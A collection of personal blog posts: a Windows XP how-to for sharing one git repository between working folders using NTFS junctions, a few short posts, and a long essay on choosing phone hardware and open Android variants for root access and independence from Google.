- ntfs
modified_time: '2011-11-17T14:47:33.704Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2649869241370803794
blogger_orig_url: https://timwise.blogspot.com/2011/11/multiple-working-folders-for-git-on.html
---
Multiple working folders for git on Windows XP (lucky me)
It is assumed that you have a git working copy of your project already in place
at `C:\code\myproject\` and that you want another copy of your project sharing
all history but with a different branch checked out at `C:\code\othercopy\`
This is useful for:
* rapidly switching between branches where a switch would normally cause a
time consuming recompile / rebuild
* tracking the branch structure of Visual SourceSafe (which you aren't using
in this century are you?) aka VSS aka Visual Source Shredder (or maybe TFS)
This can be achieved by use of [NTFS symbolic
links](http://en.wikipedia.org/wiki/NTFS_symbolic_link) (other related
keywords: junction points, reparse points, hard links). Grab [Sysinternals'
Junction](http://technet.microsoft.com/en-us/sysinternals/bb896768) to provide
access to NTFS symbolic links. Extract the contents and put `junction.exe` on
your path.
Word of warning for NTFS symbolic links in Windows XP:
* Windows Explorer in XP doesn't know about the NTFS symbolic links, and if
you delete the containing folder it will delete the real copy of your
linked folder (facepalm). **Take backups first! You have been warned!**
Open a command prompt and run the following commands:
cd c:\code\
mkdir othercopy
cd othercopy
mkdir .git
cd .git
junction hooks C:\code\myproject\.git\hooks
junction info C:\code\myproject\.git\info
junction logs C:\code\myproject\.git\logs
junction objects C:\code\myproject\.git\objects
junction refs C:\code\myproject\.git\refs
C:\code\othercopy\.git>copy C:\code\myproject\.git\* .
If you make a mistake, use `junction -d` to remove the branch point you have
created, **do not use explorer to delete a branch point** as it will delete all
your actual files.
You can now go into C:\code\othercopy\ and switch to a different branch, eg in git-bash:
cd c:
cd \code\othercopy\
git branch mynewbranch
git checkout -f mynewbranch
At this point you have two different checkouts sharing the same git data. Yay.
Word of warning for multiple working copies and
[git-extensions](http://code.google.com/p/gitextensions/):
* Git extensions gets confused if you remove a branch that one of your
working copies is on; and incorrectly shows the folder as uninitialised. To
resolve this use the context menu in explorer or the console to force
checkout a different branch.
This howto was written with "_git version 1.7.6.msysgit.0_" and _git-extensions v2.26_.
# References / see also
* [http://finik.net/2010/10/24/multiple-working-folders-with-single-git-repository/](http://finik.net/2010/10/24/multiple-working-folders-with-single-git-repository/)
* [http://en.wikipedia.org/wiki/NTFS_symbolic_link](http://en.wikipedia.org/wiki/NTFS_symbolic_link)
* [http://technet.microsoft.com/en-us/sysinternals/bb896768](http://technet.microsoft.com/en-us/sysinternals/bb896768)
* [http://code.google.com/p/gitextensions/](http://code.google.com/p/gitextensions/)
* [http://elegantcode.com/2011/03/15/git-tfs-where-have-you-been-all-my-life/](http://elegantcode.com/2011/03/15/git-tfs-where-have-you-been-all-my-life/)
* [http://github.com/spraints/git-tfs](http://github.com/spraints/git-tfs)
* Scripts for creating and unlinking extra working copies:
* [https://gist.github.com/1373136](https://gist.github.com/1373136) - create
* [https://gist.github.com/1373142](https://gist.github.com/1373142) - remove
<file_sep>---
title: "cv"
date: 2005-11-30
slashdot_url: https://slashdot.org/journal/123305/cv
---
<p>new cv released:<br><a href="http://timwise.co.uk/cv.pdf">http://timwise.co.uk/cv.pdf</a> [111Kb<nobr> </nobr>.pdf]</p>
<file_sep>---
layout: post
title: 'bad geek joke: the bourne shell'
date: '2007-03-30T00:36:00.000Z'
author: <NAME>
tags:
- fun
modified_time: '2008-07-26T15:34:20.890Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7355973608679429060
blogger_orig_url: https://timwise.blogspot.com/2007/03/bad-geek-joke-bourne-shell.html
---
Here's one I made earlier (19 Oct 2006 according to my pc):
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/7463254@N02/439217204/"><img
src="https://live.staticflickr.com/160/439217204_ddcd1306e6.jpg" alt="bourneshell.png"></a>
</div>
It's modified from [http://thebourneidentity.com/](http://thebourneidentity.com/), which is incidentally a film I very much like.
For those who don't know, this is the bourne shell:
[http://en.wikipedia.org/wiki/Bourne_shell](http://en.wikipedia.org/wiki/Bourne_shell)
Which is the father of [BASH](http://www.gnu.org/software/bash/) (/bin/bash, the Bourne Again SHell)
<file_sep>---
title: "warning: geek entry - vim"
date: 2005-11-04
slashdot_url: https://slashdot.org/journal/121333/warning-geek-entry---vim
---
<p>I've got to grips with the basics of emacs/xemacs, so I thought it was time I got up to speed with this ubiquitous vi thing.</p>
<p>I found a tutorial on my linux box (courtesy of <a href="http://www.linuxquestions.org/">linuxquestions</a>). It's under and hour, and I feel like I understand how to do basic editing now.</p>
<p>Fire up your trusty linux box, switch to a console (ctrl+alt+f1), login, then type 'vimtutor'.</p>
<p>Super, ~800 lines of interactivity that will have you up in no time...</p>
<file_sep>---
title: Phone setup notes
layout: post
---
This is epic, so here's a table of contents:
* This list will be replaced by table of contents. https://kramdown.gettalong.org/converter/html.html#toc
{:toc}
---
## About
Well this makes a good counterpart to the [laptop setup post](/2019/08/20/laptop-setup/). Similar idea, it's just a place for me to keep track of all the things involved in building a new phone from scratch. This one also explains to people who look at me like I'm mad why I don't just "do what everyone else does".
## Why don't you just...?
Most people don't think their phone install deserves a blog post, or even a lot of thought beyond a visit to the Apple "genius" bar (lol) so they can push the "copy everything to my new phone button". I'm not most people. I've been running Linux since approximately [Ubuntu 5.04 Hoary Hedgehog](https://en.wikipedia.org/wiki/Ubuntu_version_history#Ubuntu_5.04_(Hoary_Hedgehog)) in 2005 (the brown one). Even while being a ".NET developer", back when [Microsoft were still trying to simultaneously ignore and destroy Linux](https://en.wikipedia.org/wiki/Halloween_documents). What strange times we live in now with dotnet being open source and cross-platform, has the leopard changed its spots?
There are many factors in this battle for the phone in your pocket.
* The GPL's fundamental truth is that there is a tension for control over your devices between the creators of software and the users of that software. iOS and Android both believe that the users can't be trusted with full control over their device because "security". I believe this balance of power is important. Too far in either direction and things start to go badly:
* All the power in the hands of vendors at the expense of users results in exploitation, unfair pricing, anti-competitive practices, monopolies, duopolies (google+apple), cartels, and lack of innovation and quality due to lack of competition.
* On the flip side all the power in the hands of "users" (or at least user-developers) as per the pure GPL and it becomes difficult or impossible for capitalist processes to fund innovation and engineering effort due to the inability to capture generated value.
* The apps matter, I do actually want to use a phone for useful things, and increasingly web applications are a poor cousin to their equivalent apps. (Facebook, horror that it is, oscillates between making a browser unusable and making it just about possible to read and interact, they *really* want all that juicy extra data that you can get from being an installed app).
> iOS and Android both believe that users can't be trusted with full control over their device
This time in smartphones is a moment like my first linux install around the year 2006. I hated the main operating system (Windows) that I was locked in to. All the app[lication]s that I relied on (outlook, visual studio etc) were locked to the operating system I hated. And now in 2021 all the proprietary apps on phones are locked to android / iOS (gmail, authenticator, waze, google maps, banking apps, whatsapp etc.)
I could just install OpenGApps or similar to get the google play store on top of a slightly more free android variant; then install all the proprietary apps again, or I could see just how much I can do without google services by using microG and open source alternative apps like k9mail and maps.me. I've already started this journey by trying out many free alternatives and think it's worth pushing ahead. Running a build with no google services will be a good acid-test of how far I've got even if I have to go running back to the proprietary google services.
In my switch to Linux from Windows I just tried to do as much as I could with free software such as the gimp and thunderbird, often still installed on Windows, and then bit by bit I needed to fire up Windows less and less often as I found alternative apps and ways of doing things.
Any progress I can make here will make the jump to a fully free phone OS less painful in the future, and I'm increasingly confident that day will come just like I don't think twice about running Linux Mint even for work these days.
### Nursing Homes and Neighbourhoods
I highly recommend reading this article - [Purism, The Future of Computers: The Neighborhood and The Nursing Home](https://puri.sm/posts/the-future-of-computers-the-neighborhood-and-the-nursing-home/). It wonderfully illustrates the binary choice between the apple/google duopoly and the DIY open source and privacy movement with the rather apt analogy of nursing homes (apple etc where your needs are met but you give up control of your environment) and neighbourhoods (open source where it's up to you not let the wrong people in to renovate your house).
### Why not just Apple iOS?
Yes I know the iPhone crowd can just push a button on the new phone and have it look like the old phone, but iOS is the polar opposite of what I want my technology to be: under *my* control. That means root. That means open source. That means GPL.
iOS certainly does have some unique advantages that I will be sad to miss out on but not sad enough to give up all the other things I care about.
#### iOS, the good
* A secure boot chain, remarkably hacker-proof - even with physical device access which is very impressive.
* Impressively effective device-to-device migration of user settings and data (android failed miserably at this in my experiments)
#### iOS, the dubious-to-bad
* Complete reliance on a single vendor for looking after all your precious "data". This in my view is risky no matter how good the vendor is.
* In 2012 this was demonstrated as [<NAME> had *all* his data and devices wiped and locked remotely when a hacker took over his Apple account](https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/), and he had no other copy of all his precious family photos. A cautionary tale for all of us.
* Someone I know lost everything on their iPhone when the OS upgrade process somehow managed to do the following:
1. backup the phone to the iCloud
2. wipe the phone and install the updated iOS (I understand this is normal procedure)
3. back up the blank phone to iCloud *overwriting* the only backup (apparently there was only a single slot)
4. restore the blank backup to the updated phone
5. declare success, leaving my friend with all his data gone and a factory-installed OS
* No root (a problem for syncthing, independent backups and general user-control)
* No user-replaceable OS (aka ROM)
* No open source
* All the apps cost more!
### Why not just stock android?
"So you must be an android dude then" you say. Well no because frankly android isn't much better these days. Ever heard of [AOSP? (The Android Open Source Project)](https://source.android.com/) Well that's an ever-shrinking piece of what people call Android these days. Piece by piece [google have been replacing open-source android with proprietary rewrites](https://arstechnica.com/gadgets/2018/07/googles-iron-grip-on-android-controlling-open-source-by-any-means-necessary/). Combine that with proprietary drivers for the endless churn in hardware. If you can even install ASOP on a device good luck getting much to work. The idea of android being "the open source one" in the true spirit of the GPL is a distant and fading memory.
There is a cartel of industry players called the [Open Handset Alliance](https://en.wikipedia.org/wiki/Open_Handset_Alliance) <http://www.openhandsetalliance.com/index.html>. These industry groups can be good but I think in this case they are a barrier to innovation and openness.
> "OHA members are contractually forbidden from producing devices that are based on competing forks of Android"
> ~ [Wikipedia on OHA](https://en.wikipedia.org/wiki/Open_Handset_Alliance)
[Ars Technica: "Google’s iron grip on Android: Controlling open source by any means necessary"](https://arstechnica.com/gadgets/2018/07/googles-iron-grip-on-android-controlling-open-source-by-any-means-necessary/)
#### Root and backups
One of the big drivers I've had for getting a non-standard phone setup is that I don't want to rely on on google to backup everything on my phone in case it dies, but because Android is by default locked in by secure boot and doesn't give the user any root access or ability to get root access that's a bit of a problem for the normal method of backing up a device.
A laptop backup is a question of backing up `/home` plus a [dotmatrix/bootstrap](https://github.com/timabell/dotmatrix) setup for regaining interesting configuration etc.
Android is a bit more complex because it has a couple of storage areas:
* an [emulated] 'sdcard' this is kinda like `/home` on a laptop and has things like downloaded files; some of the apps use this to save things to
* storage for every individual app (I learned about the existence of this by losing all my app data)
Every app on android runs under a separate userId, which allows Android to ensure that apps can't read each other's data. This is a good thing for security, but that means if you install a "backup app" it can't read any of the data you actually want backed up. And it can't get root because that's not available to you as a user or to any non-system apps.
So that means to backup independently of google, you need root, and to get root you need to unlock the whole boot chain.
I did have root on my OnePlus 5t, but an operating system update helpfully removed that for me... breaking my backups... and root access couldn't be restored without wiping the phone... including the data I didn't have backed up because it had broken my backups. Gah. Off the back of that experience I want to make sure that I'm not set up to fight some bloody vendor that doesn't believe I should have root.
Any hope of an effective root is dwindling. According to <https://www.androidpolice.com/a-new-method-for-hiding-root-in-magisk-may-soon-emerge/> the developer of Magisk Hide that prevented root being detected and thus allowed shitty apps to continue to be run has been *hired by google*. That's google following the advice of "keep friends close, keep your enemies closer" close if ever I've seen it. No better way to shut the project down than to pay off the developer with a "salary". Cough.
### Something other than iOS or Android and its derivatives?
It's all about the apps.
> An operating system is not that useful on its own.
There's a reason [Ballmer shouted "developers developers developers"](https://www.youtube.com/watch?v=KMU0tzLwhbE) (amusing as this meme has become in the abstract). An operating system is not that useful on its own. Operating systems live and die by the applications (aka apps) available on them, and the utility and value they in turn bring to their users.
iOS and Android have utterly captured the app market on phones, creating a duopoly in the phone space.
Even the mighty Nokia (with [Symbian](https://en.wikipedia.org/wiki/Symbian)), [Research In Motion (RIM) with Blackberry](https://en.wikipedia.org/wiki/BlackBerry_10)`*` and Microsoft with [Windows Phone](https://en.wikipedia.org/wiki/Windows_Phone) failed to win against them and eventually threw in the towel.
`*` Blackberry seems to have all but fallen off the radar, they started shipping android in the end basically being a android phone with a physical keyboard thus becoming part of the apple-google duopoloy..
So for me that rules out for the time being all the Linux based phones such as a [Librem 5 running PureOS](https://shop.puri.sm/shop/librem-5/). (See below).
> It's only when alternatives like Librem/PureOS gain traction that we'll see the makers of apps, websites and phones have to create and adopt open standards that allow further diversity and innovation.
The fact the Librem exists and seems to be sustainable are encouraging signs for the breaking of the google+apple duopoly on mobiles. It's only when alternatives like Librem/PureOS gain traction that we'll see the makers of apps, websites and phones have to create and adopt open standards that allow further diversity and innovation. Currently we are seeing a repeat of the "works best in Netscape / Internet Explorer" duopoly of the browser wars that was eventually broken forever by Firefox, Opera and friends forcing websites to stop using proprietary extensions and stick to open standards.
#### Dearly departed
##### Nokia / Symbian
Symbian was briefly ahead on features as an OS in my opinion. I had a Sony Ericsson [P800](https://en.wikipedia.org/wiki/Sony_Ericsson_P800) and [P910](https://en.wikipedia.org/wiki/Sony_Ericsson_P910) and in their day they were *almost* amazing phones, hampered by lacking hardware (2g at the dawn of 3g, serial port connectivity emulated over usb, and for god knows what reason Sony were still trying to beat SD cards with [memory stick](https://en.wikipedia.org/wiki/Memory_Stick)). Consumers flocked away from them in droves to the new iPhone.
##### Microsoft / Windows Phone OS
Microsoft's ["Windows Phone" was a triumph of a phone operating system](https://www.theverge.com/2017/10/10/16452162/windows-phone-history-glorious-failure), and everyone I knew that had one absolutely loved the operating system. But [Microsoft just couldn't persuade the big-name mobile-app developers](https://www.theverge.com/2015/10/23/9602350/microsoft-windows-phone-app-removal-windows-store) (i.e. companies) to invest the endless effort required to create and maintain a third version of their apps for another app store.
##### OpenMoko / Neo FreeRunner
I had high hopes for the truly open Neo running OpenMoko, but it didn't stand a hope in hell amongst the rapidly evolving tech and software at the time. I bought the [Neo FreeRunner](https://en.wikipedia.org/wiki/Openmoko#Neo_FreeRunner) and it was an exciting time, but it quickly became a relic.
##### CyanogenMod
After many years of being the goto android-variant mobile OS for non-conformists, sadly [CyanogenMod](https://en.wikipedia.org/wiki/CyanogenMod) imploded in 2016. The code lives on in LineageOS (see below).
#### Promising futures
Two currently active non-android physical phone projects, and several more ongoing Linux based (i.e. non-android) mobile-friendly operating system efforts. Although these will never cross the radar of most people just like Linux didn't for many years) these are important foundational projects.
##### Purism's Librem 5 phone hardware running PureOS (Linux)
* [Librem 5 phone](https://shop.puri.sm/shop/librem-5/)
* [PureOS](https://pureos.net/)
The [Librem 5](https://shop.puri.sm/shop/librem-5/) is worth a look if you want to take it to the next level of openness, however it comes with a compromise in specifications, a hefty price tag (inevitable due to lower production volumes) and no android / iOS apps.
You might however want to consider spending your dollars as a vote for the future you want to see.
The [Librem 5 runs Linux (PureOS), not Android](https://puri.sm/products/librem-5/pureos-mobile/). This is great but as of 2021 does mean it suffers from the "app" problem (see above).
Because of the "app" problem I'm not ready to make the jump to a Linux based smartphone that can't run android apps. I'm also not particularly keen to drop quite this much in specification for the benefit.
Personally I'm happy with the OnePlus compromise of specification plus apps versus openness for now, but I'm very glad to see Purism pushing the frontier of openness and maybe I'll join their users one day.
##### PinePhone Pro phone hardware (Linux, for now)
The [PinePhone Pro](https://www.pine64.org/pinephonepro/) is a low spec but very open Linux phone. A follow up to the original PinePhone.
"pre-orders from developers on October 15, 2021, and expect to have them delivered by December"
Phones like this are important in building momentum in the capability of non iOS/Android software even though they will never be mainstream phones themselves.
This is a Linux phone, though in theory [GloDroid](https://glodroid.github.io/) will provide a build of Android (AOSP) for it, but don't hold your breath. - [OmgUbuntu article on PinePhone+GloDroid](https://www.omgubuntu.co.uk/2020/07/glodroid-android-for-pinephone-allwinner).
##### UBPorts Ubuntu Phone (Linux)
Canonical killed the Ubuntu Phone and the [Ubuntu Touch](https://en.wikipedia.org/wiki/Ubuntu_Touch) operating system, but the software lives on in [ubports](https://ubports.com/). (Presumably that's short for UBuntu Ports)
##### Plasma (Linux KDE for phones)
[Plasma Mobile](https://plasma-mobile.org/) is a variant of the KDE Plamsa desktop specifically for mobiles.
Learn more about [Plasma on Wikipedia](https://en.wikipedia.org/wiki/Plasma_Mobile)
##### Mobian - (Debian Linux for phones)
[Mobian](https://mobian-project.org/) is encouraging to see. Debian Linux's strenth has always been its governance and stability. Debian has been a rock in the stormy seas of open source even as different people have passed through its team. This is because debian has a strong set of organisational rules that are above and beyond any individual contributor. The fact that they are working on a mobile variant is very encouraging.
##### PostmarketOS (Linux)
[PostmarketOS](https://postmarketos.org/) is an Alpine Linux (i.e. very small) variation designed to breath life into otherwise obsolete hardware. I expect this will become more useful as phone hardware stops becoming utterly obsolete due to major changes in basic expectations and environment.
## Secure boot
There's the secure boot chain and device locking. This can be a good thing or a bad thing depending on the power dynamic between users and providers (and maybe even the state/government).
It is true that your device is less "secure" with the bootloader unlocked (as the phone likes to scream at you every time you boot it up), at least to attackers with physical access to your device, however I think that's worth the trade for full control of your device (that you paid for and "own").
[Security is not an absolute](https://www.isaca.org/resources/isaca-journal/issues/2021/volume-6/evidence-based-prioritization-of-cybersecurity-threats). You have to consider cost, inconvenience, human behaviour, the value of an attack target, the motivations of different actors (state, organised crime, hackers, opportunist thieves, trolling friends etc). For me an encrypted data partition and a passcode will do for physical security. In theory you can get full secure boot chain for custom operating systems but even on a Linux laptop this is non-trivial currently.
There's an important difference here between google/apple considering the security of their entire device eco-system in the hands of every kind of user, and the security of an individual's device customised to suit them. If google turn off secure boot for everyone then it makes it that much more likely that someone will successfully develop and spread an android virus that corrupts the boot chain. If I turn it of it's a rounding error on the probability, and a marginal difference to the "security" of my own device.
### Apple's secure boot chain
Apple don't want you to fiddle with the OS they control, so you don't get to touch it without "jailbreaking" it. Jailbreaking is done by exploiting a security flaw, and it's a cat and mouse game with Apple fixing bugs to close holes and hackers finding new ones to regain control of the devices. Not a game I want to play just to have control over my own hardware. This 100% rules out iOS for me, it's a complete dealbreaker. No matter how shiny, how bug free, how capable it is I wouldn't trade unless there was absolutely no alternative.
### Android's secure boot chain
Android also secure their boot chain by default, however whether you can unlock it and flash a different recovery/bootloader/OS/ROM depends on the phone manufacturer, individual device, and sometimes the phone network provider (aka locking/unlocking).
This means choose your device and provider carefully if you wish to unlock without wasting your time trying to jailbreaking a locked device.
### Artificial app limitations when unlocked
Android has a system that allows apps to hide or limit functionality called [SafetyNet](https://www.lineageos.org/Safetynet/). For apps like NetFlix that won't even show in the play store for unlocked phones we're into the mega-discussion that is [DRM](https://en.wikipedia.org/wiki/Digital_rights_management). In short if a content creator wants to lock their device to a locked-down platform that's fine be me but I won't be using those platforms for my main computing, instead I might have them as throw-away additional appliances like the google chromecast, or samsung TV's built in junk. What really matters here is what alternatives you have available to you. For google pay, I'm very slightly sad to miss out but my contactless debit card still works fine so I'll live.
## Hardware choices
Given the "app" problem, any devices not capable of running Android or a derivative are currently out of the running (sad times).
A non-negotiable for me is manufacturer support for replacing the bootloader and everything above that (OS, apps). This ensures the life of the device beyond the point at which the manufacturer loses interest or does something horrific/stupid. This is also a signal for who is truly in charge of the device once it's "yours" - you the user or the supplier and their developers. By locking you out of making modifications it's a clear signal that you are not to be trusted with the power over your own device.
As the useful innovation in hardware slows down (2G to 3G was a big jump, but 8-megapixels camera to 32-megapixel cameras is less foundational) it will be less often that devices will become obsolete through huge leaps in capability. It will also mean that phone hardware will inevitably become more commodity and less proprietary, giving a chance for more open standards to get a foothold (just as x86 replace proprietary CPU architectures many decades ago), while still being acceptably capable. We shouldn't be throwing out devices because the manufacturer decided not to provide security patches for their OS variant, and certainly not because the manufacturer took away a feature we like through forced updates.
### Google Nexus / Pixel (meh)
I have run a [google nexus](https://en.wikipedia.org/wiki/Google_phone) 4 previously which was flashable and rootable, but long since obsolete in hardware capabilities (and suffered a hardware failure). I never looked back at the google line after I discovered OnePlus, I can't comment on whether the current pixel phones are a good device for my constraints. I don't particularly want to further feed the beast. If you want the authentic pure google experience I guess these are probably worth a look but the pure google experience seems less and less appealing as the years roll on.
### Sony (yuck)
Someone told me that a particular Sony phone was flashable, I researched it, found instructions on flashing it, ordered one... and couldn't flash it. Discussing with Sony support it transpired that that precise model was sometimes flashable and sometimes not, and the only way to find out was to order one and look at the serial number. Fuck you Sony. They never have understood the open source movement and look like they still don't. They always treated their kit like appliances not a blend of hardware and software (or firmware) with everything that means for the long term management of the software. It's a shame because they do make nice hardware. I'd still buy a dumb Sony audio amplifier but not much else of theirs. Returned and refunded, try again...
### OnePlus (yay, no wait, boo)
This is my choice for the new [OnePlus 9 Pro](https://www.oneplus.com/uk/9-pro) I'm trying to set up, and the [OnePlus 5T](https://www.oneplus.com/uk/support/spec/oneplus-5t) I've been using for more than a couple of years now.
They don't make the grade for the pure "everything must be open including chip bytecode and chip architecture" as they use proprietary chips, but they make the right balance for me of reasonably high spec hardware for a reasonable price, android compatibility, and the ability to flash whatever ROM/OS you like (at your own risk).
I've been running a OnePlus 5t for a while now (bought outright, no network lockin or contract nonsense) and generally happy enough with it. There are some bugs and storage is starting to constrain hence the upgrade, plus the camera could be better by modern standards and I don't fancy carrying a separate camera.
I now have had the OnePlus 9 Pro sat in a drawer for two months waiting for me to figure out what-the-[FSM](https://en.wikipedia.org/wiki/Flying_Spaghetti_Monster) to run on it, hence this blog post. It's already been unlocked and I've tried flashing a couple of things but am not happy with the setup yet. I stopped looking at it while I concentrated all my efforts on making sure my business was going in the right direction (or any direction at all).
> To get root you have to wipe the phone
The OnePlus comes with OxygenOS (an android derivative) preinstalled, but not rooted and with a locked bootloader. To get root you have to wipe the phone which means it's important to do it before you start using it. It's caused me no end of pain that you can't use [titanium backup](https://www.titaniumtrack.com/titanium-backup.html) to backup all your data without root, and you can't get root without losing your files. I understand why (so you can't just unlock a phone to steal all the data) but that doesn't make it less of a pain in the arse. Bonus points for operating system updates (over the air / OTA or just normal updates) de-root the phone.
[XDA Developers detailed page on the OnePlus 9 including pro](https://www.xda-developers.com/oneplus-9/)
---
But wait, there's trouble in paradise.
The founder [<NAME> left OnePlus in 2020](https://techcrunch.com/2020/10/16/oneplus-co-founder-carl-pei-confirms-he-has-left-the-company/) after 7 years at the company.
[OnePlus was funded by an existing phone company called Oppo](https://www.androidauthority.com/oneplus-oppo-design-894687/). (And [both OnePlus and Oppo are part of BBK](https://www.androidauthority.com/oneplus-oppo-1177898/))
It seems that [OnePlus is basically now dead in the water](https://www.androidauthority.com/oneplus-oppo-complete-opinion-3025477/) as a brand if not a company in its own right and will be sucked back into whatever the mothership has to offer, breaking everything along the way by trying to merge Oppo's colorOS with OnePlus's OxygenOS into an unholy mess.
Fuck.
---
As if that wasn't enough:
> "OnePlus is adding artificial limitations and breaking features via software updates, and there are no indications that they'll improve." ~ GCam Hub, <https://www.celsoazevedo.com/files/android/google-camera/f/post-05/>
---
It turns out that the founder of OnePlus, <NAME>, has set up a new company called "[Nothing](https://nothing.tech/)" (enjoy googling that one), which did just make headphones (unexciting), but who have just announced a phone. So maybe this is the true successor to the likely dead OnePlus brand. <https://www.theverge.com/2022/3/23/22992424/nothing-phone-1-smartphone-carl-pei-apple-ecosystem>
## So what OS options does that leave?
So not iOS and preferably not Android either.
Unfortunately the apps mean that I'm stuck with Android and its derivatives for the time being.
It seems the best hope for salvation is the Linux based options discussed above eventually getting sufficient app coverage to make the jump more bearable, or maybe even some kind of android emulation allowing them to run android apps sufficiently well. The path from Windows to Linux for me included a mix of dual-boot, virtualization and wine (an api compatibility layer, not an emulator)
It's worth mentioning that some (most/all?) phone manufacturers make proprietary customizations to Android or even complete [forks](https://en.wikipedia.org/wiki/Fork_(software_development)) that you may or may not want. Samsung for example (for the Galaxy line of phones) replaces the "launcher" with the ["Samsung Experience"](https://en.wikipedia.org/wiki/Samsung_Experience). I'm going for more open rather than less, so I'm not interested in trading slickness for losing even more control. I just want a platform that runs the apps I care about and is as open as possible.
### Researching the options
I don't follow this stuff all the time so I had to do some googling ([duckduckgo](https://duckduckgo.com/)-ing). Here's some useful comparisons I turned up:
* [It's FOSS, Open Source Mobile OS Alternatives To Android](https://itsfoss.com/open-source-alternatives-android/) - mostly pure Linux things that don't have the android app ecosystem
* [PC Magazine, Break Away From Android: 7 Free Open-Source Mobile OSes to Try](https://uk.pcmag.com/linux/131295/break-away-from-android-7-free-open-source-mobile-oses-to-try)
* [GetDroidTips has some more ROMs I haven't looked at](https://www.getdroidtips.com/best-custom-rom-oneplus-9-pro/)
I've got more to learn/research here so I'll expand this section as and when I learn more. Think of this as a [bliki](https://www.webopedia.com/definitions/bliki/). There's a full history in git (link at end).
### Towering stacks of patches
The below are probably the most realistic alternatives to stock Android and iOS for those who want more openness but don't want to give up all the modern conveniences in the name of openness and/or privacy. They are however all customizations of Android and that brings a very real problem.
The core open "Android Open Source Project (AOSP)" is run by google for google's benefit and for their own Android ecosystem. There is significant engineering effort continually poured in to this, with major releases made on remarkably short timelines.
Any project that makes a customization to AOSP such as LineageOS and keeps track of it in their own fork is constantly at the mercy of changes to the foundation it has been based on, a foundation which really has no reason to care about them.
This creates a never ending challenge that stunts innovation outside the Android/iOS duopoly. If you build a significant customization, it will sooner or later be broken and need re-engineering because of changes in AOSP, or maybe even be impossible to resurrect. The more you innovate and customize, the more engineering fire-power is required just to stand still on the treadmill of change in the platform.
While we have good tools for managing all this complexity (git, gerrit) this is a fundamental and unavoidable problem with building on a platform that doesn't care about you.
Contrast that with the Linux ecosystem where the platforms people are building on (consisting of many many layers and teams) are much more interested in supporting downstream projects and allowing choice. Projects that run on Linux can often run with minimal modification for decades. Linux is also not built for the benefit of some particular vendor like google with their own agenda, it is instead run by a foundation with far more broad interests and pressures.
### Android derivative options
I now need to look into the below and decide what to run (maybe with some trial flashing). Once that's done it'll be on to the slog of setting up the actual device how I want it.
#### OxygenOS from OnePlus - used to be good, now dying a painful death
See the section on OnePlus hardware above. The company and OS are in trouble now the founder has left and the operating system has been merged with Oppo's colorOS (read "fucked")
* <https://www.oneplus.com/uk/oxygenos>
This is the default for the OnePlus device I have, which means it's the most likely to make the hardware perform at its best.
After a [wobble on data reporting](https://www.theverge.com/circuitbreaker/2017/10/11/16457954/oneplus-phones-collecting-sensitive-data) (which I'm not too bothered about) they seem to have largely sorted out their privacy game... apart from being full of google services just like the rest of the mainstream android devices. To play or not to play...
Here's [the original article disclosing OnePlus silently sending data home](https://www.chrisdcmoore.co.uk/post/oneplus-analytics/).
It seems the latest news is that Oxygen is falling apart. [XDA Developers: "OxygenOS 12 for the OnePlus 9 series is littered with bugs"](https://www.xda-developers.com/oneplus-9-oxygenos-12-stable-update-bugs/)
> "It was shit after merge with #Oppo and getting worst day by day. I really like #OnePlus device but #OxygenOS is dead now." ~ [@rahulawanjari, 9 Dec 2021, twitter](https://twitter.com/rahulawanjari/status/1468885793691168771?s=20)
Crap, there goes another good option. As if the mobile phone space wasn't horrific enough already.
In fact OxygenOS 12 was so bad, that they've just [OnePlus pulled the plug on the entire OxygenOS 12 upgrade!!](https://www.androidpolice.com/oneplus-is-pulling-its-oxygenos-12-update-for-the-op-9-and-9-pro/)
Bonus points for the anti-competitive practice of [actively denying access to hardware features (secondary cameras)](https://www.gizmochina.com/2021/12/13/oxygenos-12-blocks-access-to-auxiliary-cameras-on-third-party-camera-apps/). I hope the courts slap them down for this clearly anti-competitive behaviour.
---
So after discovering that shit-show-in-paradise from OnePlus I could potentially skip OxygenOS 12 and stick to the less f*cked OxygenOS 11, but that doesn't seem like much of a plan so it looks like I'll be skipping any fancy hardware capability and looking for a more open and less broken Android variant. Yet more proof that corporations can't be trusted as guardians of our software for the long term without GPL or at least MIT to stop them from hurting their users sooner or later. Did I mention my podcast is called "Software Should Be Free". Does this horror show give you a hint as to why it's called that?
#### LineageOS (yep)
[LineageOS](https://lineageos.org/) is the successor to the now defunct CyanogenMod. [See the history of LineageOS and it's relationship to CyanogenMod here on Wikipedia](https://en.wikipedia.org/wiki/LineageOS).
CyanogenMod was a bastian of freedom and innovation. I hope Lineage has managed to continue that.
There does appear to be [a build of LineageOS for the OnePlus 9 pro](https://download.lineageos.org/lemonadep) - I think this is worth trying out.
LineageOS has it's own recovery image, so no need to run TWRP as well.
[Review of LineageOS on XDA Developers](https://www.xda-developers.com/lineageos-18-1-review/)
#### Lineage for microG (maybe?)
* <https://lineage.microg.org/>
* <https://github.com/lineageos4microg>
This is a fork of lineage with microG already set up properly and a patch that lineage wouldn't allow that let's them spoof google signatures in order to trick apps into believing they are using the real google play services
> Q: "Why do we need a custom build of LineageOS to have microG? Can't I install microG on the official LineageOS?"
>
> A: "MicroG requires a patch called "signature spoofing", which allows the microG's apps to spoof themselves as Google Apps. LineageOS' developers refused (multiple times) to include the patch, forcing us to fork their project."
> ~ [Lineage for microG faq](https://lineage.microg.org/#faq)
#### Replicant (not yet)
"[Replicant](https://replicant.us/) is a fully free Android distribution running on several devices"
I'm glad this freedom is here but I'm not quite ready to give up every last proprietary thing until there's a bit less of a gap.
[Supported devices](https://redmine.replicant.us/projects/replicant/wiki#Supported-devices) shows purely Samsung Galaxy devices currently.
#### /e/ (aka Eelo)
<https://e.foundation/>
> "We build desirable, open source, privacy-enabled smartphone operating systems."
This Android derivative is focussed on privacy; eliminating as much data collection (i.e. all things google) as possible. Laudable but not my main focus right now.
You can buy their reconditioned phones with their OS pre-installed or just install the OS on something else.
They provide their own alternative cloud hosting for contacts etc for reasonable prices.
Their dev build has a root option it seems which might be useful. - <https://doc.e.foundation/support-topics/root-e-os.html>
* [/e/ on wikipedia](https://en.wikipedia.org/wiki//e/_(operating_system))
* [itsfoss.com/eelo-mobile-os](https://itsfoss.com/eelo-mobile-os/)
* <https://www.pcmag.com/news/google-free-android-smartphones-are-now-available-in-the-us>
#### GrapheneOS (nope)
> "[GrapheneOS](https://grapheneos.org/) - The private and secure mobile operating system with Android app compatibility. Developed as a non-profit open source project."
